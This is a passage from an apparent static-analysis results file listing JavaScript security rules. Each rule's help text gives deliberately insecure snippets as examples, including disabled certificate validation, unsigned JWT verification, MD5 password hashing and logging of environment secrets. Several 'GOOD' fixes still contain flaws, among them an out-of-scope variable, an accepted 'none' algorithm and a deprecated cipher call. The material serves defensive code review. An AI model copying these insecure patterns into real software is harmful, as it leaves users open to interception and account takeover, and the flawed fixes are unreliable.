');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-1004](https://cwe.mitre.org/data/definitions/1004.html).\n", + "markdown" : "# Sensitive server cookie exposed to the client\nAuthentication cookies stored by a server can be accessed by a client if the `httpOnly` flag is not set.\n\nAn attacker that manages a cross-site scripting (XSS) attack can read the cookie and hijack the session.\n\n\n## Recommendation\nSet the `httpOnly` flag on all cookies that are not needed by the client.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be viewed by the client.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-1004](https://cwe.mitre.org/data/definitions/1004.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-1004" ], + "description" : "Sensitive cookies set by a server can be read by the client if the `httpOnly` flag is not set.", + "id" : "js/client-exposed-cookie", + "kind" : "problem", + "name" : "Sensitive server cookie exposed to the client", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "5.0" + } + }, { + "id" : "js/disabling-certificate-validation", + "name" : "js/disabling-certificate-validation", + "shortDescription" : { + "text" : "Disabling certificate validation" + }, + "fullDescription" : { + "text" : "Disabling cryptographic certificate validation can cause security vulnerabilities." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Disabling certificate validation\nCertificate validation is the standard authentication method of a secure TLS connection. Without it, there is no guarantee about who the other party of a TLS connection is, making man-in-the-middle attacks more likely to occur\n\nWhen testing software that uses TLS connections, it may be useful to disable the certificate validation temporarily. But disabling it in production environments is strongly discouraged, unless an alternative method of authentication is used.\n\n\n## Recommendation\nDo not disable certificate validation for TLS connections.\n\n\n## Example\nThe following example shows a HTTPS connection that transfers confidential information to a remote server. But the connection is not secure since the `rejectUnauthorized` option of the connection is set to `false`. As a consequence, anyone can impersonate the remote server, and receive the confidential information.\n\n\n```javascript\nlet https = require(\"https\");\n\nhttps.request(\n {\n hostname: \"secure.my-online-bank.com\",\n port: 443,\n method: \"POST\",\n path: \"send-confidential-information\",\n rejectUnauthorized: false // BAD\n },\n response => {\n // ... communicate with secure.my-online-bank.com\n }\n);\n\n```\nTo make the connection secure, the `rejectUnauthorized` option should have its default value, or be explicitly set to `true`.\n\n\n## References\n* Wikipedia: [Transport Layer Security (TLS)](https://en.wikipedia.org/wiki/Transport_Layer_Security)\n* Wikipedia: [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Node.js: [TLS (SSL)](https://nodejs.org/api/tls.html)\n* Common Weakness Enumeration: [CWE-295](https://cwe.mitre.org/data/definitions/295.html).\n* Common Weakness Enumeration: [CWE-297](https://cwe.mitre.org/data/definitions/297.html).\n", + "markdown" : "# Disabling certificate validation\nCertificate validation is the standard authentication method of a secure TLS connection. Without it, there is no guarantee about who the other party of a TLS connection is, making man-in-the-middle attacks more likely to occur\n\nWhen testing software that uses TLS connections, it may be useful to disable the certificate validation temporarily. But disabling it in production environments is strongly discouraged, unless an alternative method of authentication is used.\n\n\n## Recommendation\nDo not disable certificate validation for TLS connections.\n\n\n## Example\nThe following example shows a HTTPS connection that transfers confidential information to a remote server. But the connection is not secure since the `rejectUnauthorized` option of the connection is set to `false`. As a consequence, anyone can impersonate the remote server, and receive the confidential information.\n\n\n```javascript\nlet https = require(\"https\");\n\nhttps.request(\n {\n hostname: \"secure.my-online-bank.com\",\n port: 443,\n method: \"POST\",\n path: \"send-confidential-information\",\n rejectUnauthorized: false // BAD\n },\n response => {\n // ... communicate with secure.my-online-bank.com\n }\n);\n\n```\nTo make the connection secure, the `rejectUnauthorized` option should have its default value, or be explicitly set to `true`.\n\n\n## References\n* Wikipedia: [Transport Layer Security (TLS)](https://en.wikipedia.org/wiki/Transport_Layer_Security)\n* Wikipedia: [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Node.js: [TLS (SSL)](https://nodejs.org/api/tls.html)\n* Common Weakness Enumeration: [CWE-295](https://cwe.mitre.org/data/definitions/295.html).\n* Common Weakness Enumeration: [CWE-297](https://cwe.mitre.org/data/definitions/297.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-295", "external/cwe/cwe-297" ], + "description" : "Disabling cryptographic certificate validation can cause security vulnerabilities.", + "id" : "js/disabling-certificate-validation", + "kind" : "problem", + "name" : "Disabling certificate validation", + "precision" : "very-high", + "problem.severity" : "error", + "security-severity" : "7.5" + } + }, { + "id" : "js/jwt-missing-verification", + "name" : "js/jwt-missing-verification", + "shortDescription" : { + "text" : "JWT missing secret or public key verification" + }, + "fullDescription" : { + "text" : "The application does not verify the JWT payload with a cryptographic secret or public key." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# JWT missing secret or public key verification\nApplications decoding JSON Web Tokens (JWT) may be misconfigured due to the `None` algorithm.\n\nThe `None` algorithm is selected by calling the `verify()` function with a falsy value instead of a cryptographic secret or key. The `None` algorithm disables the integrity enforcement of a JWT payload and may allow a malicious actor to make unintended changes to a JWT payload leading to critical security issues like privilege escalation.\n\n\n## Recommendation\nCalls to `verify()` functions should use a cryptographic secret or key to decode JWT payloads.\n\n\n## Example\nIn the example below, `false` is used to disable the integrity enforcement of a JWT payload. This may allow a malicious actor to make changes to a JWT payload.\n\n\n```javascript\nconst jwt = require(\"jsonwebtoken\");\n\nconst secret = \"my-secret-key\";\n\nvar token = jwt.sign({ foo: 'bar' }, secret, { algorithm: \"none\" })\njwt.verify(token, false, { algorithms: [\"HS256\", \"none\"] })\n```\nThe following code fixes the problem by using a cryptographic secret or key to decode JWT payloads.\n\n\n```javascript\n\nconst jwt = require(\"jsonwebtoken\");\n\nconst secret = \"my-secret-key\";\n\nvar token = jwt.sign({ foo: 'bar' }, secret, { algorithm: \"HS256\" }) \njwt.verify(token, secret, { algorithms: [\"HS256\", \"none\"] })\n```\n\n## References\n* Auth0 Blog: [Meet the \"None\" Algorithm](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/#Meet-the--None--Algorithm).\n* Common Weakness Enumeration: [CWE-347](https://cwe.mitre.org/data/definitions/347.html).\n", + "markdown" : "# JWT missing secret or public key verification\nApplications decoding JSON Web Tokens (JWT) may be misconfigured due to the `None` algorithm.\n\nThe `None` algorithm is selected by calling the `verify()` function with a falsy value instead of a cryptographic secret or key. The `None` algorithm disables the integrity enforcement of a JWT payload and may allow a malicious actor to make unintended changes to a JWT payload leading to critical security issues like privilege escalation.\n\n\n## Recommendation\nCalls to `verify()` functions should use a cryptographic secret or key to decode JWT payloads.\n\n\n## Example\nIn the example below, `false` is used to disable the integrity enforcement of a JWT payload. This may allow a malicious actor to make changes to a JWT payload.\n\n\n```javascript\nconst jwt = require(\"jsonwebtoken\");\n\nconst secret = \"my-secret-key\";\n\nvar token = jwt.sign({ foo: 'bar' }, secret, { algorithm: \"none\" })\njwt.verify(token, false, { algorithms: [\"HS256\", \"none\"] })\n```\nThe following code fixes the problem by using a cryptographic secret or key to decode JWT payloads.\n\n\n```javascript\n\nconst jwt = require(\"jsonwebtoken\");\n\nconst secret = \"my-secret-key\";\n\nvar token = jwt.sign({ foo: 'bar' }, secret, { algorithm: \"HS256\" }) \njwt.verify(token, secret, { algorithms: [\"HS256\", \"none\"] })\n```\n\n## References\n* Auth0 Blog: [Meet the \"None\" Algorithm](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/#Meet-the--None--Algorithm).\n* Common Weakness Enumeration: [CWE-347](https://cwe.mitre.org/data/definitions/347.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-347" ], + "description" : "The application does not verify the JWT payload with a cryptographic secret or public key.", + "id" : "js/jwt-missing-verification", + "kind" : "problem", + "name" : "JWT missing secret or public key verification", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.0" + } + }, { + "id" : "js/insufficient-password-hash", + "name" : "js/insufficient-password-hash", + "shortDescription" : { + "text" : "Use of password hash with insufficient computational effort" + }, + "fullDescription" : { + "text" : "Creating a hash of a password with low computational effort makes the hash vulnerable to password cracking attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Use of password hash with insufficient computational effort\nStoring cryptographic hashes of passwords is standard security practice, but it is equally important to select the right hashing scheme. If an attacker obtains the hashed passwords of an application, the password hashing scheme should still prevent the attacker from easily obtaining the original cleartext passwords.\n\nA good password hashing scheme requires a computation that cannot be done efficiently. Standard hashing schemes, such as `md5` or `sha1`, are efficiently computable, and are therefore not suitable for password hashing.\n\n\n## Recommendation\nUse a secure password hashing scheme such as `bcrypt`, `scrypt`, `PBKDF2`, or `Argon2`.\n\n\n## Example\nIn the example below, the `md5` algorithm computes the hash of a password.\n\n\n```javascript\nconst crypto = require(\"crypto\");\nfunction hashPassword(password) {\n var hasher = crypto.createHash('md5');\n var hashed = hasher.update(password).digest(\"hex\"); // BAD\n return hashed;\n}\n\n```\nThis is not secure, since the password can be efficiently cracked by an attacker that obtains the hash. A more secure scheme is to hash the password with the `bcrypt` algorithm:\n\n\n```javascript\nconst bcrypt = require(\"bcrypt\");\nfunction hashPassword(password, salt) {\n var hashed = bcrypt.hashSync(password, salt); // GOOD\n return hashed;\n}\n\n```\n\n## References\n* OWASP: [Password storage](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-916](https://cwe.mitre.org/data/definitions/916.html).\n", + "markdown" : "# Use of password hash with insufficient computational effort\nStoring cryptographic hashes of passwords is standard security practice, but it is equally important to select the right hashing scheme. If an attacker obtains the hashed passwords of an application, the password hashing scheme should still prevent the attacker from easily obtaining the original cleartext passwords.\n\nA good password hashing scheme requires a computation that cannot be done efficiently. Standard hashing schemes, such as `md5` or `sha1`, are efficiently computable, and are therefore not suitable for password hashing.\n\n\n## Recommendation\nUse a secure password hashing scheme such as `bcrypt`, `scrypt`, `PBKDF2`, or `Argon2`.\n\n\n## Example\nIn the example below, the `md5` algorithm computes the hash of a password.\n\n\n```javascript\nconst crypto = require(\"crypto\");\nfunction hashPassword(password) {\n var hasher = crypto.createHash('md5');\n var hashed = hasher.update(password).digest(\"hex\"); // BAD\n return hashed;\n}\n\n```\nThis is not secure, since the password can be efficiently cracked by an attacker that obtains the hash. A more secure scheme is to hash the password with the `bcrypt` algorithm:\n\n\n```javascript\nconst bcrypt = require(\"bcrypt\");\nfunction hashPassword(password, salt) {\n var hashed = bcrypt.hashSync(password, salt); // GOOD\n return hashed;\n}\n\n```\n\n## References\n* OWASP: [Password storage](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-916](https://cwe.mitre.org/data/definitions/916.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-916" ], + "description" : "Creating a hash of a password with low computational effort makes the hash vulnerable to password cracking attacks.", + "id" : "js/insufficient-password-hash", + "kind" : "path-problem", + "name" : "Use of password hash with insufficient computational effort", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "8.1" + } + }, { + "id" : "js/unvalidated-dynamic-method-call", + "name" : "js/unvalidated-dynamic-method-call", + "shortDescription" : { + "text" : "Unvalidated dynamic method call" + }, + "fullDescription" : { + "text" : "Calling a method with a user-controlled name may dispatch to an unexpected target, which could cause an exception." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Unvalidated dynamic method call\nJavaScript makes it easy to look up object properties dynamically at runtime. In particular, methods can be looked up by name and then called. However, if the method name is user-controlled, an attacker could choose a name that makes the application invoke an unexpected method, which may cause a runtime exception. If this exception is not handled, it could be used to mount a denial-of-service attack.\n\nFor example, there might not be a method of the given name, or the result of the lookup might not be a function. In either case the method call will throw a `TypeError` at runtime.\n\nAnother, more subtle example is where the result of the lookup is a standard library method from `Object.prototype`, which most objects have on their prototype chain. Examples of such methods include `valueOf`, `hasOwnProperty` and `__defineSetter__`. If the method call passes the wrong number or kind of arguments to these methods, they will throw an exception.\n\n\n## Recommendation\nIt is best to avoid dynamic method lookup involving user-controlled names altogether, for instance by using a `Map` instead of a plain object.\n\nIf the dynamic method lookup cannot be avoided, consider whitelisting permitted method names. At the very least, check that the method is an own property and not inherited from the prototype object. If the object on which the method is looked up contains properties that are not methods, you should additionally check that the result of the lookup is a function. Even if the object only contains methods, it is still a good idea to perform this check in case other properties are added to the object later on.\n\n\n## Example\nIn the following example, an HTTP request parameter `action` property is used to dynamically look up a function in the `actions` map, which is then invoked with the `payload` parameter as its argument.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = {\n play(data) {\n // ...\n },\n pause(data) {\n // ...\n }\n}\n\napp.get('/perform/:action/:payload', function(req, res) {\n let action = actions[req.params.action];\n // BAD: `action` may not be a function\n res.end(action(req.params.payload));\n});\n\n```\nThe intention is to allow clients to invoke the `play` or `pause` method, but there is no check that `action` is actually the name of a method stored in `actions`. If, for example, `action` is `rewind`, `action` will be `undefined` and the call will result in a runtime error.\n\nThe easiest way to prevent this is to turn `actions` into a `Map` and using `Map.prototype.has` to check whether the method name is valid before looking it up.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = new Map();\nactions.set(\"play\", function play(data) {\n // ...\n});\nactions.set(\"pause\", function pause(data) {\n // ...\n});\n\napp.get('/perform/:action/:payload', function(req, res) {\n if (actions.has(req.params.action)) {\n if (typeof actions.get(req.params.action) === 'function'){\n let action = actions.get(req.params.action);\n }\n // GOOD: `action` is either the `play` or the `pause` function from above\n res.end(action(req.params.payload));\n } else {\n res.end(\"Unsupported action.\");\n }\n});\n\n```\nIf `actions` cannot be turned into a `Map`, a `hasOwnProperty` check should be added to validate the method name:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = {\n play(data) {\n // ...\n },\n pause(data) {\n // ...\n }\n}\n\napp.get('/perform/:action/:payload', function(req, res) {\n if (actions.hasOwnProperty(req.params.action)) {\n let action = actions[req.params.action];\n if (typeof action === 'function') {\n // GOOD: `action` is an own method of `actions`\n res.end(action(req.params.payload));\n return;\n }\n }\n res.end(\"Unsupported action.\");\n});\n\n```\n\n## References\n* OWASP: [Denial of Service](https://www.owasp.org/index.php/Denial_of_Service).\n* MDN: [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map).\n* MDN: [Object.prototype](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/prototype).\n* Common Weakness Enumeration: [CWE-754](https://cwe.mitre.org/data/definitions/754.html).\n", + "markdown" : "# Unvalidated dynamic method call\nJavaScript makes it easy to look up object properties dynamically at runtime. In particular, methods can be looked up by name and then called. However, if the method name is user-controlled, an attacker could choose a name that makes the application invoke an unexpected method, which may cause a runtime exception. If this exception is not handled, it could be used to mount a denial-of-service attack.\n\nFor example, there might not be a method of the given name, or the result of the lookup might not be a function. In either case the method call will throw a `TypeError` at runtime.\n\nAnother, more subtle example is where the result of the lookup is a standard library method from `Object.prototype`, which most objects have on their prototype chain. Examples of such methods include `valueOf`, `hasOwnProperty` and `__defineSetter__`. If the method call passes the wrong number or kind of arguments to these methods, they will throw an exception.\n\n\n## Recommendation\nIt is best to avoid dynamic method lookup involving user-controlled names altogether, for instance by using a `Map` instead of a plain object.\n\nIf the dynamic method lookup cannot be avoided, consider whitelisting permitted method names. At the very least, check that the method is an own property and not inherited from the prototype object. If the object on which the method is looked up contains properties that are not methods, you should additionally check that the result of the lookup is a function. Even if the object only contains methods, it is still a good idea to perform this check in case other properties are added to the object later on.\n\n\n## Example\nIn the following example, an HTTP request parameter `action` property is used to dynamically look up a function in the `actions` map, which is then invoked with the `payload` parameter as its argument.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = {\n play(data) {\n // ...\n },\n pause(data) {\n // ...\n }\n}\n\napp.get('/perform/:action/:payload', function(req, res) {\n let action = actions[req.params.action];\n // BAD: `action` may not be a function\n res.end(action(req.params.payload));\n});\n\n```\nThe intention is to allow clients to invoke the `play` or `pause` method, but there is no check that `action` is actually the name of a method stored in `actions`. If, for example, `action` is `rewind`, `action` will be `undefined` and the call will result in a runtime error.\n\nThe easiest way to prevent this is to turn `actions` into a `Map` and using `Map.prototype.has` to check whether the method name is valid before looking it up.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = new Map();\nactions.set(\"play\", function play(data) {\n // ...\n});\nactions.set(\"pause\", function pause(data) {\n // ...\n});\n\napp.get('/perform/:action/:payload', function(req, res) {\n if (actions.has(req.params.action)) {\n if (typeof actions.get(req.params.action) === 'function'){\n let action = actions.get(req.params.action);\n }\n // GOOD: `action` is either the `play` or the `pause` function from above\n res.end(action(req.params.payload));\n } else {\n res.end(\"Unsupported action.\");\n }\n});\n\n```\nIf `actions` cannot be turned into a `Map`, a `hasOwnProperty` check should be added to validate the method name:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = {\n play(data) {\n // ...\n },\n pause(data) {\n // ...\n }\n}\n\napp.get('/perform/:action/:payload', function(req, res) {\n if (actions.hasOwnProperty(req.params.action)) {\n let action = actions[req.params.action];\n if (typeof action === 'function') {\n // GOOD: `action` is an own method of `actions`\n res.end(action(req.params.payload));\n return;\n }\n }\n res.end(\"Unsupported action.\");\n});\n\n```\n\n## References\n* OWASP: [Denial of Service](https://www.owasp.org/index.php/Denial_of_Service).\n* MDN: [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map).\n* MDN: [Object.prototype](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/prototype).\n* Common Weakness Enumeration: [CWE-754](https://cwe.mitre.org/data/definitions/754.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-754" ], + "description" : "Calling a method with a user-controlled name may dispatch to\n an unexpected target, which could cause an exception.", + "id" : "js/unvalidated-dynamic-method-call", + "kind" : "path-problem", + "name" : "Unvalidated dynamic method call", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/clear-text-storage-of-sensitive-data", + "name" : "js/clear-text-storage-of-sensitive-data", + "shortDescription" : { + "text" : "Clear text storage of sensitive information" + }, + "fullDescription" : { + "text" : "Sensitive information stored without encryption or hashing can expose it to an attacker." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Clear text storage of sensitive information\nSensitive information that is stored unencrypted is accessible to an attacker who gains access to the storage. This is particularly important for cookies, which are stored on the machine of the end-user.\n\n\n## Recommendation\nEnsure that sensitive information is always encrypted before being stored. If possible, avoid placing sensitive information in cookies altogether. Instead, prefer storing, in the cookie, a key that can be used to look up the sensitive information.\n\nIn general, decrypt sensitive information only at the point where it is necessary for it to be used in cleartext.\n\nBe aware that external processes often store the `standard out` and `standard error` streams of the application, causing logged sensitive information to be stored as well.\n\n\n## Example\nThe following example code stores user credentials (in this case, their password) in a cookie in plain text:\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\napp.get('/remember-password', function (req, res) {\n let pw = req.param(\"current_password\");\n // BAD: Setting a cookie value with cleartext sensitive data.\n res.cookie(\"password\", pw);\n});\n\n```\nInstead, the credentials should be encrypted, for instance by using the Node.js `crypto` module:\n\n\n```javascript\nvar express = require('express');\nvar crypto = require('crypto'),\n password = getPassword();\n\nfunction encrypt(text){\n var cipher = crypto.createCipher('aes-256-ctr', password);\n return cipher.update(text, 'utf8', 'hex') + cipher.final('hex');\n}\n\nvar app = express();\napp.get('/remember-password', function (req, res) {\n let pw = req.param(\"current_password\");\n // GOOD: Encoding the value before setting it.\n res.cookie(\"password\", encrypt(pw));\n});\n\n```\n\n## References\n* M. Dowd, J. McDonald and J. Schuhm, *The Art of Software Security Assessment*, 1st Edition, Chapter 2 - 'Common Vulnerabilities of Encryption', p. 43. Addison Wesley, 2006.\n* M. Howard and D. LeBlanc, *Writing Secure Code*, 2nd Edition, Chapter 9 - 'Protecting Secret Data', p. 299. Microsoft, 2002.\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-315](https://cwe.mitre.org/data/definitions/315.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n", + "markdown" : "# Clear text storage of sensitive information\nSensitive information that is stored unencrypted is accessible to an attacker who gains access to the storage. This is particularly important for cookies, which are stored on the machine of the end-user.\n\n\n## Recommendation\nEnsure that sensitive information is always encrypted before being stored. If possible, avoid placing sensitive information in cookies altogether. Instead, prefer storing, in the cookie, a key that can be used to look up the sensitive information.\n\nIn general, decrypt sensitive information only at the point where it is necessary for it to be used in cleartext.\n\nBe aware that external processes often store the `standard out` and `standard error` streams of the application, causing logged sensitive information to be stored as well.\n\n\n## Example\nThe following example code stores user credentials (in this case, their password) in a cookie in plain text:\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\napp.get('/remember-password', function (req, res) {\n let pw = req.param(\"current_password\");\n // BAD: Setting a cookie value with cleartext sensitive data.\n res.cookie(\"password\", pw);\n});\n\n```\nInstead, the credentials should be encrypted, for instance by using the Node.js `crypto` module:\n\n\n```javascript\nvar express = require('express');\nvar crypto = require('crypto'),\n password = getPassword();\n\nfunction encrypt(text){\n var cipher = crypto.createCipher('aes-256-ctr', password);\n return cipher.update(text, 'utf8', 'hex') + cipher.final('hex');\n}\n\nvar app = express();\napp.get('/remember-password', function (req, res) {\n let pw = req.param(\"current_password\");\n // GOOD: Encoding the value before setting it.\n res.cookie(\"password\", encrypt(pw));\n});\n\n```\n\n## References\n* M. Dowd, J. McDonald and J. Schuhm, *The Art of Software Security Assessment*, 1st Edition, Chapter 2 - 'Common Vulnerabilities of Encryption', p. 43. Addison Wesley, 2006.\n* M. Howard and D. LeBlanc, *Writing Secure Code*, 2nd Edition, Chapter 9 - 'Protecting Secret Data', p. 299. Microsoft, 2002.\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-315](https://cwe.mitre.org/data/definitions/315.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-312", "external/cwe/cwe-315", "external/cwe/cwe-359" ], + "description" : "Sensitive information stored without encryption or hashing can expose it to an\n attacker.", + "id" : "js/clear-text-storage-of-sensitive-data", + "kind" : "path-problem", + "name" : "Clear text storage of sensitive information", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.5" + } + }, { + "id" : "js/clear-text-logging", + "name" : "js/clear-text-logging", + "shortDescription" : { + "text" : "Clear-text logging of sensitive information" + }, + "fullDescription" : { + "text" : "Logging sensitive information without encryption or hashing can expose it to an attacker." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Clear-text logging of sensitive information\nIf sensitive data is written to a log entry it could be exposed to an attacker who gains access to the logs.\n\nPotential attackers can obtain sensitive user data when the log output is displayed. Additionally that data may expose system information such as full path names, system information, and sometimes usernames and passwords.\n\n\n## Recommendation\nSensitive data should not be logged.\n\n\n## Example\nIn the example the entire process environment is logged using \\`console.info\\`. Regular users of the production deployed application should not have access to this much information about the environment configuration.\n\n\n```javascript\n// BAD: Logging cleartext sensitive data\nconsole.info(`[INFO] Environment: ${process.env}`);\n```\nIn the second example the data that is logged is not sensitive.\n\n\n```javascript\nlet not_sensitive_data = { a: 1, b : 2} \n// GOOD: it is fine to log data that is not sensitive\nconsole.info(`[INFO] Some object contains: ${not_sensitive_data}`);\n```\n\n## References\n* OWASP: [Insertion of Sensitive Information into Log File](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n* Common Weakness Enumeration: [CWE-532](https://cwe.mitre.org/data/definitions/532.html).\n", + "markdown" : "# Clear-text logging of sensitive information\nIf sensitive data is written to a log entry it could be exposed to an attacker who gains access to the logs.\n\nPotential attackers can obtain sensitive user data when the log output is displayed. Additionally that data may expose system information such as full path names, system information, and sometimes usernames and passwords.\n\n\n## Recommendation\nSensitive data should not be logged.\n\n\n## Example\nIn the example the entire process environment is logged using \\`console.info\\`. Regular users of the production deployed application should not have access to this much information about the environment configuration.\n\n\n```javascript\n// BAD: Logging cleartext sensitive data\nconsole.info(`[INFO] Environment: ${process.env}`);\n```\nIn the second example the data that is logged is not sensitive.\n\n\n```javascript\nlet not_sensitive_data = { a: 1, b : 2} \n// GOOD: it is fine to log data that is not sensitive\nconsole.info(`[INFO] Some object contains: ${not_sensitive_data}`);\n```\n\n## References\n* OWASP: [Insertion of Sensitive Information into Log File](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n* Common Weakness Enumeration: [CWE-532](https://cwe.mitre.org/data/definitions/532.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-312", "external/cwe/cwe-359", "external/cwe/cwe-532" ], + "description" : "Logging sensitive information without encryption or hashing can\n expose it to an attacker.", + "id" : "js/clear-text-logging", + "kind" : "path-problem", + "name" : "Clear-text logging of sensitive information", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.5" + } + }, { + "id" : "js/build-artifact-leak", + "name" : "js/build-artifact-leak", + "shortDescription" : { + "text" : "Storage of sensitive information in build artifact" + }, + "fullDescription" : { + "text" : "Including sensitive information in a build artifact can expose it to an attacker." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Storage of sensitive information in build artifact\nSensitive information included in a build artifact can allow an attacker to access the sensitive information if the artifact is published.\n\n\n## Recommendation\nOnly store information that is meant to be publicly available in a build artifact.\n\n\n## Example\nThe following example creates a `webpack` configuration that inserts all environment variables from the host into the build artifact:\n\n\n```javascript\nconst webpack = require(\"webpack\");\n\nmodule.exports = [{\n plugins: [\n new webpack.DefinePlugin({\n \"process.env\": JSON.stringify(process.env)\n })\n ]\n}];\n```\nThe environment variables might include API keys or other sensitive information, and the build-system should instead insert only the environment variables that are supposed to be public.\n\nThe issue has been fixed below, where only the `DEBUG` environment variable is inserted into the artifact.\n\n\n```javascript\nconst webpack = require(\"webpack\");\n\nmodule.exports = [{\n plugins: [\n new webpack.DefinePlugin({\n 'process.env': JSON.stringify({ DEBUG: process.env.DEBUG })\n })\n ]\n}];\n\n```\n\n## References\n* webpack: [DefinePlugin API](https://webpack.js.org/plugins/define-plugin/).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-315](https://cwe.mitre.org/data/definitions/315.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n", + "markdown" : "# Storage of sensitive information in build artifact\nSensitive information included in a build artifact can allow an attacker to access the sensitive information if the artifact is published.\n\n\n## Recommendation\nOnly store information that is meant to be publicly available in a build artifact.\n\n\n## Example\nThe following example creates a `webpack` configuration that inserts all environment variables from the host into the build artifact:\n\n\n```javascript\nconst webpack = require(\"webpack\");\n\nmodule.exports = [{\n plugins: [\n new webpack.DefinePlugin({\n \"process.env\": JSON.stringify(process.env)\n })\n ]\n}];\n```\nThe environment variables might include API keys or other sensitive information, and the build-system should instead insert only the environment variables that are supposed to be public.\n\nThe issue has been fixed below, where only the `DEBUG` environment variable is inserted into the artifact.\n\n\n```javascript\nconst webpack = require(\"webpack\");\n\nmodule.exports = [{\n plugins: [\n new webpack.DefinePlugin({\n 'process.env': JSON.stringify({ DEBUG: process.env.DEBUG })\n })\n ]\n}];\n\n```\n\n## References\n* webpack: [DefinePlugin API](https://webpack.js.org/plugins/define-plugin/).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-315](https://cwe.mitre.org/data/definitions/315.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-312", "external/cwe/cwe-315", "external/cwe/cwe-359" ], + "description" : "Including sensitive information in a build 